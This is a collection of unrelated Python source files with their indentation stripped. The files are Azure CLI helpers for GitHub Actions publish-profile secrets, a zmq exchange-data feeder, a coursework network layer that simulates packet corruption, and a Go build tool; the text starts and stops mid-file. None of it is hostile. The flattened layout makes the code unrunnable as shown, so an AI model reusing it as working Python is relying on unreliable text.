logger.warning("Removing the existing workflow file")
github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
sha=existing_workflow_file.sha, branch=branch)
except UnknownObjectException as e:
error_msg = "Error when removing workflow file."
if e.data and e.data['message']:
error_msg += " Error: {}".format(e.data['message'])
raise CLIError(error_msg)
# Remove publish profile from GitHub
if existing_publish_profile_name:
logger.warning('Removing publish profile from GitHub')
_remove_publish_profile_from_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo, token=token,
github_actions_secret_name=existing_publish_profile_name, slot=slot)
# Remove site source control properties
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
return "Disconnected successfully."
def _get_publish_profile_from_workflow_file(workflow_file):
import re
publish_profile = None
regex = re.search(r'publish-profile: \$\{\{ secrets\..*?\}\}', workflow_file)
if regex:
publish_profile = regex.group()
publish_profile = publish_profile.replace('publish-profile: ${{ secrets.', '')
publish_profile = publish_profile[:-2]
if publish_profile:
return publish_profile.strip()
return None
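# Added note (not from the original module): given a workflow line such as
#   publish-profile: ${{ secrets.MYAPP_PUBLISH_PROFILE }}
# the helper above returns 'MYAPP_PUBLISH_PROFILE'. The secret name shown here is a
# made-up example, not a value the CLI produces.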
def _update_site_source_control_properties_for_gh_action(cmd, resource_group, name, token, repo=None,
branch="master", slot=None):
if repo:
repo_url = 'https://github.com/' + repo
else:
repo_url = None
site_source_control = show_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
if site_source_control:
if not repo_url:
repo_url = site_source_control.repo_url
delete_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
slot=slot)
config_source_control(cmd=cmd,
resource_group_name=resource_group,
name=name,
repo_url=repo_url,
repository_type='github',
github_action=True,
branch=branch,
git_token=token,
slot=slot)
def _get_workflow_template(github, runtime_string, is_linux):
from github import GithubException
from github.GithubException import BadCredentialsException
file_contents = None
template_repo_path = 'Azure/actions-workflow-templates'
template_file_path = _get_template_file_path(runtime_string=runtime_string, is_linux=is_linux)
try:
template_repo = github.get_repo(template_repo_path)
file_contents = template_repo.get_contents(template_file_path)
except BadCredentialsException:
raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
"the --token argument. Run 'az webapp deployment github-actions add --help' "
"for more information.")
except GithubException as e:
error_msg = "Encountered GitHub error when retrieving workflow template"
if e.data and e.data['message']:
error_msg += ": {}".format(e.data['message'])
raise CLIError(error_msg)
return file_contents
def _fill_workflow_template(content, name, branch, slot, publish_profile, version):
if not slot:
slot = 'production'
content = content.replace('${web-app-name}', name)
content = content.replace('${branch}', branch)
content = content.replace('${slot-name}', slot)
content = content.replace('${azure-webapp-publish-profile-name}', publish_profile)
content = content.replace('${AZURE_WEBAPP_PUBLISH_PROFILE}', publish_profile)
content = content.replace('${dotnet-core-version}', version)
content = content.replace('${java-version}', version)
content = content.replace('${node-version}', version)
content = content.replace('${python-version}', version)
return content
def _get_template_file_path(runtime_string, is_linux):
if not runtime_string:
raise CLIError('Unable to retrieve workflow template')
runtime_string = runtime_string.lower()
runtime_stack = runtime_string.split('|')[0]
template_file_path = None
if is_linux:
template_file_path = LINUX_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
else:
# Handle java naming
if runtime_stack == 'java':
java_container_split = runtime_string.split('|')
            if java_container_split and len(java_container_split) >= 3:  # index 2 (container name) must exist
if java_container_split[2] == 'tomcat':
runtime_stack = 'tomcat'
elif java_container_split[2] == 'java se':
runtime_stack = 'java'
template_file_path = WINDOWS_GITHUB_ACTIONS_WORKFLOW_TEMPLATE_PATH.get(runtime_stack, None)
if not template_file_path:
raise CLIError('Unable to retrieve workflow template.')
return template_file_path
def _add_publish_profile_to_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
# Get publish profile with secrets
import requests
logger.warning("Fetching publish profile with secrets for the app '%s'", name)
publish_profile_bytes = _generic_site_operation(
cmd.cli_ctx, resource_group, name, 'list_publishing_profile_xml_with_secrets',
slot, {"format": "WebDeploy"})
publish_profile = list(publish_profile_bytes)
if publish_profile:
publish_profile = publish_profile[0].decode('ascii')
else:
raise CLIError('Unable to retrieve publish profile.')
# Add publish profile with secrets as a GitHub Actions Secret in the repo
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
headers['Content-Type'] = 'application/json;'
headers['Accept'] = 'application/json;'
public_key_url = "https://api.github.com/repos/{}/actions/secrets/public-key".format(repo)
public_key = requests.get(public_key_url, headers=headers)
if not public_key.ok:
raise CLIError('Request to GitHub for public key failed.')
public_key = public_key.json()
encrypted_github_actions_secret = _encrypt_github_actions_secret(public_key=public_key['key'],
secret_value=str(publish_profile))
payload = {
"encrypted_value": encrypted_github_actions_secret,
"key_id": public_key['key_id']
}
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
stored_secret = requests.put(store_secret_url, data=json.dumps(payload), headers=headers)
if str(stored_secret.status_code)[0] != '2':
raise CLIError('Unable to add publish profile to GitHub. Request status code: %s' % stored_secret.status_code)
def _remove_publish_profile_from_github(cmd, resource_group, name, repo, token, github_actions_secret_name, slot=None):
headers = {}
headers['Authorization'] = 'Token {}'.format(token)
import requests
store_secret_url = "https://api.github.com/repos/{}/actions/secrets/{}".format(repo, github_actions_secret_name)
requests.delete(store_secret_url, headers=headers)
def _runtime_supports_github_actions(runtime_string, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
supports = False
for stack in stacks:
if stack['displayName'].lower() == runtime_string.lower():
if 'github_actions_properties' in stack and stack['github_actions_properties']:
supports = True
return supports
def _get_app_runtime_info(cmd, resource_group, name, slot, is_linux):
app_settings = None
app_runtime = None
if is_linux:
app_metadata = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime = getattr(app_metadata, 'linux_fx_version', None)
return _get_app_runtime_info_helper(app_runtime, "", is_linux)
app_metadata = _generic_site_operation(cmd.cli_ctx, resource_group, name, 'list_metadata', slot)
app_metadata_properties = getattr(app_metadata, 'properties', {})
if 'CURRENT_STACK' in app_metadata_properties:
app_runtime = app_metadata_properties['CURRENT_STACK']
if app_runtime and app_runtime.lower() == 'node':
app_settings = get_app_settings(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
for app_setting in app_settings:
if 'name' in app_setting and app_setting['name'] == 'WEBSITE_NODE_DEFAULT_VERSION':
app_runtime_version = app_setting['value'] if 'value' in app_setting else None
if app_runtime_version:
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'python':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = getattr(app_settings, 'python_version', '')
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'dotnetcore':
        app_runtime_version = ""
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
elif app_runtime and app_runtime.lower() == 'java':
app_settings = get_site_configs(cmd=cmd, resource_group_name=resource_group, name=name, slot=slot)
app_runtime_version = "{java_version}, {java_container}, {java_container_version}".format(
java_version=getattr(app_settings, 'java_version', '').lower(),
java_container=getattr(app_settings, 'java_container', '').lower(),
java_container_version=getattr(app_settings, 'java_container_version', '').lower()
)
return _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux)
def _get_app_runtime_info_helper(app_runtime, app_runtime_version, is_linux):
if is_linux:
stacks = get_file_json(RUNTIME_STACKS)['linux']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if stack['displayName'].lower() == app_runtime.lower():
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
else:
stacks = get_file_json(RUNTIME_STACKS)['windows']
for stack in stacks:
if 'github_actions_properties' in stack and stack['github_actions_properties']:
if (stack['github_actions_properties']['app_runtime'].lower() == app_runtime.lower() and
stack['github_actions_properties']['app_runtime_version'].lower() ==
app_runtime_version.lower()):
return {
"display_name": stack['displayName'],
"github_actions_version": stack['github_actions_properties']['github_actions_version']
}
return None
def _encrypt_github_actions_secret(public_key, secret_value):
# Encrypt a Unicode string using the public key
    from base64 import b64encode
    from nacl import encoding, public  # PyNaCl; provides the libsodium sealed-box primitives used below
public_key = public.PublicKey(public_key.encode("utf-8"), encoding.Base64Encoder())
sealed_box = public.SealedBox(public_key)
encrypted = sealed_box.encrypt(secret_value.encode("utf-8"))
return b64encode(encrypted).decode("utf-8")
|
endpoint_binder.py
|
import zmq
import time
import sys, json
from random import randrange, randint
import random
import queue, threading, multiprocessing
import binascii
import gzip
import pprint
from .exchange import BinanceDriver
from .endpoint import SocketEndppoint, PushPub
class Feeder(threading.Thread):
output = queue.Queue()
def __init__(self, config, subscribe):
threading.Thread.__init__(self)
self.config = config
self.subheaders = subscribe
self.childs = []
for i in config['exchanges']:
driver_config = {"exchange": i['name'],
"pairs":i['pairs'],
"mode": i["mode"],
"output": multiprocessing.Queue()
}
public_drv = BinanceDriver( conf=driver_config, addr=config['addr'], port=config['port'][0] )
public_drv.start()
self.childs.append(public_drv)
pull_pub = PushPub("drivers_pull_pub",
pull_address= f"{config['addr']}:{config['port'][0]}",
pub_address= f"0.0.0.0:{config['port'][1]}")
pull_pub.start()
self.childs.append(pull_pub)
self.endpoint = SocketEndppoint(sources=[ f"0.0.0.0:{config['port'][1]}" ],
endpoint=f"0.0.0.0:{config['port'][2]}")
self.endpoint.start()
self.childs.append(self.endpoint)
def socket_listener(self):
context = zmq.Context()
subscriber = context.socket(zmq.SUB)
subscriber.connect(f"tcp://{self.config['addr']}:{self.config['port'][2]}")
for i in self.subheaders:
subscriber.setsockopt(zmq.SUBSCRIBE, f"{i}@".encode())
try:
while True:
try:
rcv = subscriber.recv()
except zmq.Again as e:
print(e)
else:
# topic, payload = rcv.split(b'@',1)
# payload = gzip.decompress(payload)
# payload = json.loads(payload)
self.output.put(rcv)
except KeyboardInterrupt as e:
pass
def queue_listener(self, q):
try:
while True:
try:
rcv = q.get()
self.output.put(rcv)
except Exception as e:
print(e)
except KeyboardInterrupt as e:
pass
def run(self):
thread_id = []
th = threading.Thread(target=self.socket_listener)
th.start()
thread_id.append(th)
try:
for i in thread_id:
i.join()
for i in self.childs:
i.join()
except KeyboardInterrupt as e:
pass
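# Illustrative sketch (added, not part of the original module): Feeder expects a config dict
# roughly shaped as below. The exchange name, pairs, address and port numbers are assumptions
# made up for this example.
#
# example_config = {
#     'addr': '127.0.0.1',
#     'port': [5555, 5556, 5557],  # driver push port, pub port, endpoint port
#     'exchanges': [
#         {'name': 'binance', 'pairs': ['btcusdt', 'ethusdt'], 'mode': 'trade'},
#     ],
# }
# feeder = Feeder(example_config, subscribe=['btcusdt'])
# feeder.start()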
|
Network.py
|
import argparse
import socket
import threading
from time import sleep
import random
import RDT
## Provides an abstraction for the network layer
class NetworkLayer:
#configuration parameters
prob_pkt_loss = 0
prob_byte_corr = .3
prob_pkt_reorder = 0
#class variables
sock = None
conn = None
buffer_S = ''
lock = threading.Lock()
collect_thread = None
stop = None
socket_timeout = 0.01
reorder_msg_S = None
def __init__(self, role_S, server_S, port):
if role_S == 'client':
print('Network: role is client')
self.conn = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.conn.connect((server_S, port))
self.conn.settimeout(self.socket_timeout)
elif role_S == 'server':
print('Network: role is server')
self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sock.bind(('localhost', port))
self.sock.listen(1)
self.conn, addr = self.sock.accept()
self.conn.settimeout(self.socket_timeout)
#start the thread to receive data on the connection
self.collect_thread = threading.Thread(name='Collector', target=self.collect)
self.stop = False
self.collect_thread.start()
def disconnect(self):
if self.collect_thread:
self.stop = True
self.collect_thread.join()
def __del__(self):
if self.sock is not None: self.sock.close()
if self.conn is not None: self.conn.close()
def udt_send(self, msg_S):
#return without sending if the packet is being dropped
if random.random() < self.prob_pkt_loss:
return
#corrupt a packet
if random.random() < self.prob_byte_corr:
start = random.randint(RDT.Packet.length_S_length,len(msg_S)-5) #make sure we are not corrupting the length field,
#since that makes life really difficult
num = random.randint(1,5)
repl_S = ''.join(random.sample('XXXXX', num)) #sample length >= num
msg_S = msg_S[:start]+repl_S+msg_S[start+num:]
#reorder packets - either hold a packet back, or if one held back then send both
if random.random() < self.prob_pkt_reorder or self.reorder_msg_S:
if self.reorder_msg_S is None:
self.reorder_msg_S = msg_S
return None
else:
msg_S += self.reorder_msg_S
self.reorder_msg_S = None
#keep calling send until all the bytes are transferred
totalsent = 0
while totalsent < len(msg_S):
sent = self.conn.send(msg_S[totalsent:].encode('utf-8'))
if sent == 0:
raise RuntimeError("socket connection broken")
totalsent = totalsent + sent
## Receive data from the network and save in internal buffer
def collect(self):
# print (threading.currentThread().getName() + ': Starting')
while(True):
try:
recv_bytes = self.conn.recv(2048)
with self.lock:
self.buffer_S += recv_bytes.decode('utf-8')
# you may need to uncomment the BlockingIOError handling on Windows machines
# except BlockingIOError as err:
# pass
except socket.timeout as err:
pass
if self.stop:
# print (threading.currentThread().getName() + ': Ending')
return
## Deliver collected data to client
def udt_receive(self):
with self.lock:
ret_S = self.buffer_S
self.buffer_S = ''
return ret_S
if __name__ == '__main__':
parser = argparse.ArgumentParser(description='Network layer implementation.')
parser.add_argument('role', help='Role is either client or server.', choices=['client', 'server'])
parser.add_argument('server', help='Server.')
parser.add_argument('port', help='Port.', type=int)
args = parser.parse_args()
network = NetworkLayer(args.role, args.server, args.port)
if args.role == 'client':
network.udt_send('MSG_FROM_CLIENT')
sleep(2)
print(network.udt_receive())
network.disconnect()
else:
sleep(1)
print(network.udt_receive())
network.udt_send('MSG_FROM_SERVER')
network.disconnect()
|
go_tool.py
|
from __future__ import absolute_import, unicode_literals
import argparse
import codecs
import copy
import json
import os
import re
import shutil
import subprocess
import sys
import tarfile
import tempfile
import threading
import six
from functools import reduce
import process_command_files as pcf
import process_whole_archive_option as pwa
arc_project_prefix = 'a.yandex-team.ru/'
std_lib_prefix = 'contrib/go/_std/src/'
vendor_prefix = 'vendor/'
vet_info_ext = '.vet.out'
vet_report_ext = '.vet.txt'
FIXED_CGO1_SUFFIX='.fixed.cgo1.go'
COMPILE_OPTIMIZATION_FLAGS=('-N',)
def get_trimpath_args(args):
return ['-trimpath', args.trimpath] if args.trimpath else []
def preprocess_cgo1(src_path, dst_path, source_root):
with open(src_path, 'r') as f:
content = f.read()
content = content.replace('__ARCADIA_SOURCE_ROOT_PREFIX__', source_root)
with open(dst_path, 'w') as f:
f.write(content)
def preprocess_args(args):
    # Temporary workaround for noauto
if args.cgo_srcs and len(args.cgo_srcs) > 0:
cgo_srcs_set = set(args.cgo_srcs)
args.srcs = [x for x in args.srcs if x not in cgo_srcs_set]
args.pkg_root = os.path.join(args.toolchain_root, 'pkg')
toolchain_tool_root = os.path.join(args.pkg_root, 'tool', '{}_{}'.format(args.host_os, args.host_arch))
args.go_compile = os.path.join(toolchain_tool_root, 'compile')
args.go_cgo = os.path.join(toolchain_tool_root, 'cgo')
args.go_link = os.path.join(toolchain_tool_root, 'link')
args.go_asm = os.path.join(toolchain_tool_root, 'asm')
args.go_pack = os.path.join(toolchain_tool_root, 'pack')
args.go_vet = os.path.join(toolchain_tool_root, 'vet') if args.vet is True else args.vet
args.output = os.path.normpath(args.output)
args.vet_report_output = vet_report_output_name(args.output, args.vet_report_ext)
args.trimpath = None
if args.debug_root_map:
roots = {'build': args.build_root, 'source': args.source_root, 'tools': args.tools_root}
replaces = []
for root in args.debug_root_map.split(';'):
src, dst = root.split('=', 1)
assert src in roots
replaces.append('{}=>{}'.format(roots[src], dst))
del roots[src]
assert len(replaces) > 0
args.trimpath = ';'.join(replaces)
args.build_root = os.path.normpath(args.build_root)
args.build_root_dir = args.build_root + os.path.sep
args.source_root = os.path.normpath(args.source_root)
args.source_root_dir = args.source_root + os.path.sep
args.output_root = os.path.normpath(args.output_root)
args.import_map = {}
args.module_map = {}
if args.cgo_peers:
args.cgo_peers = [x for x in args.cgo_peers if not x.endswith('.fake.pkg')]
srcs = []
for f in args.srcs:
if f.endswith('.gosrc'):
with tarfile.open(f, 'r') as tar:
srcs.extend(os.path.join(args.output_root, src) for src in tar.getnames())
tar.extractall(path=args.output_root)
else:
srcs.append(f)
args.srcs = srcs
assert args.mode == 'test' or args.test_srcs is None and args.xtest_srcs is None
    # add lexical order by basename for go sources
args.srcs.sort(key=lambda x: os.path.basename(x))
if args.test_srcs:
args.srcs += sorted(args.test_srcs, key=lambda x: os.path.basename(x))
del args.test_srcs
if args.xtest_srcs:
args.xtest_srcs.sort(key=lambda x: os.path.basename(x))
# compute root relative module dir path
assert args.output is None or args.output_root == os.path.dirname(args.output)
assert args.output_root.startswith(args.build_root_dir)
args.module_path = args.output_root[len(args.build_root_dir):]
args.source_module_dir = os.path.join(args.source_root, args.test_import_path or args.module_path) + os.path.sep
assert len(args.module_path) > 0
args.import_path, args.is_std = get_import_path(args.module_path)
assert args.asmhdr is None or args.word == 'go'
srcs = []
for f in args.srcs:
if f.endswith(FIXED_CGO1_SUFFIX) and f.startswith(args.build_root_dir):
path = os.path.join(args.output_root, '{}.cgo1.go'.format(os.path.basename(f[:-len(FIXED_CGO1_SUFFIX)])))
srcs.append(path)
preprocess_cgo1(f, path, args.source_root)
else:
srcs.append(f)
args.srcs = srcs
if args.extldflags:
args.extldflags = pwa.ProcessWholeArchiveOption(args.targ_os).construct_cmd(args.extldflags)
classify_srcs(args.srcs, args)
def compare_versions(version1, version2):
def last_index(version):
index = version.find('beta')
return len(version) if index < 0 else index
v1 = tuple(x.zfill(8) for x in version1[:last_index(version1)].split('.'))
v2 = tuple(x.zfill(8) for x in version2[:last_index(version2)].split('.'))
if v1 == v2:
return 0
return 1 if v1 < v2 else -1
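# Added examples (not from the original file) illustrating the return convention above:
#   compare_versions('1.17', '1.17') == 0    # equal
#   compare_versions('1.16', '1.18') == 1    # first argument is the older version
#   compare_versions('1.18', '1.16') == -1   # first argument is the newer version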
def get_symlink_or_copyfile():
os_symlink = getattr(os, 'symlink', None)
if os_symlink is None:
os_symlink = shutil.copyfile
return os_symlink
def copy_args(args):
return copy.copy(args)
def get_vendor_index(import_path):
index = import_path.rfind('/' + vendor_prefix)
if index < 0:
index = 0 if import_path.startswith(vendor_prefix) else index
else:
index = index + 1
return index
def get_import_path(module_path):
assert len(module_path) > 0
import_path = module_path.replace('\\', '/')
is_std_module = import_path.startswith(std_lib_prefix)
if is_std_module:
import_path = import_path[len(std_lib_prefix):]
elif import_path.startswith(vendor_prefix):
import_path = import_path[len(vendor_prefix):]
else:
import_path = arc_project_prefix + import_path
assert len(import_path) > 0
return import_path, is_std_module
def call(cmd, cwd, env=None):
# sys.stderr.write('{}\n'.format(' '.join(cmd)))
return subprocess.check_output(cmd, stdin=None, stderr=subprocess.STDOUT, cwd=cwd, env=env)
def classify_srcs(srcs, args):
args.go_srcs = [x for x in srcs if x.endswith('.go')]
args.asm_srcs = [x for x in srcs if x.endswith('.s')]
args.objects = [x for x in srcs if x.endswith('.o') or x.endswith('.obj')]
args.symabis = [x for x in srcs if x.endswith('.symabis')]
args.sysos = [x for x in srcs if x.endswith('.syso')]
def get_import_config_info(peers, gen_importmap, import_map={}, module_map={}):
info = {'importmap': [], 'packagefile': [], 'standard': {}}
if gen_importmap:
for key, value in six.iteritems(import_map):
info['importmap'].append((key, value))
for peer in peers:
peer_import_path, is_std = get_import_path(os.path.dirname(peer))
if gen_importmap:
index = get_vendor_index(peer_import_path)
if index >= 0:
index += len(vendor_prefix)
info['importmap'].append((peer_import_path[index:], peer_import_path))
info['packagefile'].append((peer_import_path, os.path.join(args.build_root, peer)))
if is_std:
info['standard'][peer_import_path] = True
for key, value in six.iteritems(module_map):
info['packagefile'].append((key, value))
return info
def create_import_config(peers, gen_importmap, import_map={}, module_map={}):
lines = []
info = get_import_config_info(peers, gen_importmap, import_map, module_map)
for key in ('importmap', 'packagefile'):
for item in info[key]:
lines.append('{} {}={}'.format(key, *item))
if len(lines) > 0:
lines.append('')
content = '\n'.join(lines)
# sys.stderr.writelines('{}\n'.format(l) for l in lines)
with tempfile.NamedTemporaryFile(delete=False) as f:
f.write(content.encode('UTF-8'))
return f.name
return None
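# Added note: the temporary file written above follows the Go toolchain importcfg format,
# i.e. one 'importmap old=new' or 'packagefile importpath=archive' entry per line, e.g.
#   importmap golang.org/x/net=vendor/golang.org/x/net
#   packagefile a.yandex-team.ru/library/go/core/log=/build/library/go/core/log.a
# The concrete paths shown here are invented for illustration only.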
def create_embed_config(args):
data = {
'Patterns': {},
'Files': {},
}
for info in args.embed:
pattern = info[0]
if pattern.endswith('/**/*'):
pattern = pattern[:-3]
files = {os.path.relpath(f, args.source_module_dir).replace('\\', '/'): f for f in info[1:]}
data['Patterns'][pattern] = list(files.keys())
data['Files'].update(files)
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
with tempfile.NamedTemporaryFile(delete=False, suffix='.embedcfg') as f:
f.write(json.dumps(data).encode('UTF-8'))
return f.name
def vet_info_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_info_ext)
def vet_report_output_name(path, ext=None):
return '{}{}'.format(path, ext or vet_report_ext)
def get_source_path(args):
return args.test_import_path or args.module_path
def gen_vet_info(args):
import_path = args.real_import_path if hasattr(args, 'real_import_path') else args.import_path
info = get_import_config_info(args.peers, True, args.import_map, args.module_map)
import_map = dict(info['importmap'])
# FIXME(snermolaev): it seems that adding import map for 'fake' package
    # doesn't do any harm (it needs to be revised later)
import_map['unsafe'] = 'unsafe'
for (key, _) in info['packagefile']:
if key not in import_map:
import_map[key] = key
data = {
'ID': import_path,
'Compiler': 'gc',
'Dir': os.path.join(args.source_root, get_source_path(args)),
'ImportPath': import_path,
'GoFiles': [x for x in args.go_srcs if x.endswith('.go')],
'NonGoFiles': [x for x in args.go_srcs if not x.endswith('.go')],
'ImportMap': import_map,
'PackageFile': dict(info['packagefile']),
'Standard': dict(info['standard']),
'PackageVetx': dict((key, vet_info_output_name(value)) for key, value in info['packagefile']),
'VetxOnly': False,
'VetxOutput': vet_info_output_name(args.output),
'SucceedOnTypecheckFailure': False
}
# sys.stderr.write('{}\n'.format(json.dumps(data, indent=4)))
return data
def create_vet_config(args, info):
with tempfile.NamedTemporaryFile(delete=False, suffix='.cfg') as f:
f.write(json.dumps(info).encode('UTF-8'))
return f.name
def decode_vet_report(json_report):
report = ''
if json_report:
try:
full_diags = json.JSONDecoder().decode(json_report.decode('UTF-8'))
except ValueError:
report = json_report
else:
messages = []
for _, module_diags in six.iteritems(full_diags):
for _, type_diags in six.iteritems(module_diags):
for diag in type_diags:
messages.append('{}: {}'.format(diag['posn'], json.dumps(diag['message'])))
report = '\n'.join(messages)
return report
def dump_vet_report(args, report):
if report:
report = report.replace(args.build_root, '$B')
report = report.replace(args.source_root, '$S')
with open(args.vet_report_output, 'w') as f:
f.write(report)
def read_vet_report(args):
assert args
report = ''
if os.path.exists(args.vet_report_output):
with open(args.vet_report_output, 'r') as f:
report += f.read()
return report
def dump_vet_report_for_tests(args, *test_args_list):
dump_vet_report(args, reduce(lambda x, y: x + read_vet_report(y), [_f for _f in test_args_list if _f], ''))
def do_vet(args):
assert args.vet
info = gen_vet_info(args)
vet_config = create_vet_config(args, info)
cmd = [args.go_vet, '-json']
if args.vet_flags:
cmd.extend(args.vet_flags)
cmd.append(vet_config)
# sys.stderr.write('>>>> [{}]\n'.format(' '.join(cmd)))
p_vet = subprocess.Popen(cmd, stdin=None, stderr=subprocess.PIPE, stdout=subprocess.PIPE, cwd=args.source_root)
vet_out, vet_err = p_vet.communicate()
report = decode_vet_report(vet_out) if vet_out else ''
dump_vet_report(args, report)
if p_vet.returncode:
raise subprocess.CalledProcessError(returncode=p_vet.returncode, cmd=cmd, output=vet_err)
def _do_compile_go(args):
import_path, is_std_module = args.import_path, args.is_std
cmd = [
args.go_compile,
'-o',
args.output,
'-p',
import_path,
'-D',
'""',
'-goversion',
'go{}'.format(args.goversion)
]
cmd.extend(get_trimpath_args(args))
compiling_runtime = False
if is_std_module:
cmd.append('-std')
if import_path in ('runtime', 'internal/abi', 'internal/bytealg', 'internal/cpu') or import_path.startswith('runtime/internal/'):
cmd.append('-+')
compiling_runtime = True
import_config_name = create_import_config(args.peers, True, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
else:
if import_path == 'unsafe' or len(args.objects) > 0 or args.asmhdr:
pass
else:
cmd.append('-complete')
# if compare_versions('1.16', args.goversion) >= 0:
if args.embed:
embed_config_name = create_embed_config(args)
cmd.extend(['-embedcfg', embed_config_name])
if args.asmhdr:
cmd += ['-asmhdr', args.asmhdr]
# Use .symabis (starting from 1.12 version)
if args.symabis:
cmd += ['-symabis'] + args.symabis
# If 1.12 <= version < 1.13 we have to pass -allabis for 'runtime' and 'runtime/internal/atomic'
# if compare_versions('1.13', args.goversion) >= 0:
# pass
# elif import_path in ('runtime', 'runtime/internal/atomic'):
# cmd.append('-allabis')
compile_workers = '4'
if args.compile_flags:
if compiling_runtime:
cmd.extend(x for x in args.compile_flags if x not in COMPILE_OPTIMIZATION_FLAGS)
else:
cmd.extend(args.compile_flags)
if any([x in ('-race', '-shared') for x in args.compile_flags]):
compile_workers = '1'
cmd += ['-pack', '-c={}'.format(compile_workers)]
cmd += args.go_srcs
call(cmd, args.build_root)
class VetThread(threading.Thread):
def __init__(self, target, args):
super(VetThread, self).__init__(target=target, args=args)
self.exc_info = None
def run(self):
try:
super(VetThread, self).run()
except:
self.exc_info = sys.exc_info()
def join_with_exception(self, reraise_exception):
self.join()
if reraise_exception and self.exc_info:
six.reraise(self.exc_info[0], self.exc_info[1], self.exc_info[2])
def do_compile_go(args):
raise_exception_from_vet = False
if args.vet:
run_vet = VetThread(target=do_vet, args=(args,))
run_vet.start()
try:
_do_compile_go(args)
raise_exception_from_vet = True
finally:
if args.vet:
run_vet.join_with_exception(raise_exception_from_vet)
def do_compile_asm(args):
def need_compiling_runtime(import_path):
return import_path in ('runtime', 'reflect', 'syscall') or \
import_path.startswith('runtime/internal/') or \
compare_versions('1.17', args.goversion) >= 0 and import_path == 'internal/bytealg'
assert(len(args.srcs) == 1 and len(args.asm_srcs) == 1)
cmd = [args.go_asm]
cmd += get_trimpath_args(args)
cmd += ['-I', args.output_root, '-I', os.path.join(args.pkg_root, 'include')]
cmd += ['-D', 'GOOS_' + args.targ_os, '-D', 'GOARCH_' + args.targ_arch, '-o', args.output]
# if compare_versions('1.16', args.goversion) >= 0:
cmd += ['-p', args.import_path]
if need_compiling_runtime(args.import_path):
cmd += ['-compiling-runtime']
if args.asm_flags:
cmd += args.asm_flags
cmd += args.asm_srcs
call(cmd, args.build_root)
def do_link_lib(args):
if len(args.asm_srcs) > 0:
asmargs = copy_args(args)
asmargs.asmhdr = os.path.join(asmargs.output_root, 'go_asm.h')
do_compile_go(asmargs)
for src in asmargs.asm_srcs:
asmargs.srcs = [src]
asmargs.asm_srcs = [src]
asmargs.output = os.path.join(asmargs.output_root, os.path.basename(src) + '.o')
do_compile_asm(asmargs)
args.objects.append(asmargs.output)
else:
do_compile_go(args)
if args.objects or args.sysos:
cmd = [args.go_pack, 'r', args.output] + args.objects + args.sysos
call(cmd, args.build_root)
def do_link_exe(args):
assert args.extld is not None
assert args.non_local_peers is not None
compile_args = copy_args(args)
compile_args.output = os.path.join(args.output_root, 'main.a')
compile_args.real_import_path = compile_args.import_path
compile_args.import_path = 'main'
if args.vcs and os.path.isfile(compile_args.vcs):
build_info = os.path.join('library', 'go', 'core', 'buildinfo')
if any([x.startswith(build_info) for x in compile_args.peers]):
compile_args.go_srcs.append(compile_args.vcs)
do_link_lib(compile_args)
cmd = [args.go_link, '-o', args.output]
import_config_name = create_import_config(args.peers + args.non_local_peers, False, args.import_map, args.module_map)
if import_config_name:
cmd += ['-importcfg', import_config_name]
if args.link_flags:
cmd += args.link_flags
if args.mode in ('exe', 'test'):
cmd.append('-buildmode=exe')
elif args.mode == 'dll':
cmd.append('-buildmode=c-shared')
else:
assert False, 'Unexpected mode: {}'.format(args.mode)
cmd.append('-extld={}'.format(args.extld))
extldflags = []
if args.extldflags is not None:
filter_musl = bool
if args.musl:
cmd.append('-linkmode=external')
extldflags.append('-static')
filter_musl = lambda x: x not in ('-lc', '-ldl', '-lm', '-lpthread', '-lrt')
extldflags += [x for x in args.extldflags if filter_musl(x)]
cgo_peers = []
if args.cgo_peers is not None and len(args.cgo_peers) > 0:
is_group = args.targ_os == 'linux'
if is_group:
cgo_peers.append('-Wl,--start-group')
cgo_peers.extend(args.cgo_peers)
if is_group:
cgo_peers.append('-Wl,--end-group')
try:
index = extldflags.index('--cgo-peers')
extldflags = extldflags[:index] + cgo_peers + extldflags[index+1:]
except ValueError:
extldflags.extend(cgo_peers)
if len(extldflags) > 0:
cmd.append('-extldflags={}'.format(' '.join(extldflags)))
cmd.append(compile_args.output)
call(cmd, args.build_root)
def gen_cover_info(args):
lines = []
lines.extend([
"""
var (
coverCounters = make(map[string][]uint32)
coverBlocks = make(map[string][]testing.CoverBlock)
)
""",
'func init() {',
])
for var, file in (x.split(':') for x in args.cover_info):
lines.append(' coverRegisterFile("{file}", _cover0.{var}.Count[:], _cover0.{var}.Pos[:], _cover0.{var}.NumStmt[:])'.format(file=file, var=var))
lines.extend([
'}',
"""
func coverRegisterFile(fileName string, counter []uint32, pos []uint32, numStmts []uint16) {
if 3*len(counter) != len(pos) || len(counter) != len(numStmts) {
panic("coverage: mismatched sizes")
}
if coverCounters[fileName] != nil {
// Already registered.
return
}
coverCounters[fileName] = counter
block := make([]testing.CoverBlock, len(counter))
